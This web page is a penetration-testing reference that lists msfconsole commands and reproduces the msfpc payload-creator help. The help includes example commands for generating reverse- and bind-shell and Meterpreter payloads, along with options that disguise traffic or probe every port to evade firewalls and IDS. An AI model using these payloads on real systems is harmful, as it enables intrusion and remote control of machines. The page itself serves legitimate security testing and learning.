Share this page : facebooktwitterlinkedinmailfacebooktwitterlinkedinmail
MSFconsole
pushm         Pushes the active or list of modules onto the module stack
quit          Exit the console
reload_all    Reloads all modules from all defined module paths
rename_job    Rename a job
resource      Run the commands stored in a file
route         Route traffic through a session
save          Saves the active datastores
search        Searches module names and descriptions
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
show          Displays modules of a given type, or all modules

 

Command: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

 

MSF payload creator

/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: /usr/bin/msfpc windows 192.168.1.10        # Windows & manual IP.
/usr/bin/msfpc elf bind eth0 4444          # Linux, eth0’s IP & manual port.
/usr/bin/msfpc stageless cmd py https      # Python, stageless command prompt.
/usr/bin/msfpc verbose loop eth1           # A payload for every type, using eth1’s IP.
/usr/bin/msfpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
/usr/bin/msfpc help verbose                # Help screen, with even more information.

<TYPE>:
+ ASP
+ ASPX
+ Bash [.sh] + Java [.jsp] + Linux [.elf] + OSX [.macho] + Perl [.pl] + PHP
+ Powershell [.ps1] + Python [.py] + Tomcat [.war] + Windows [.exe // .dll]

Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More ‘stable’ than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol – e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol – e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to ‘allports’ based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.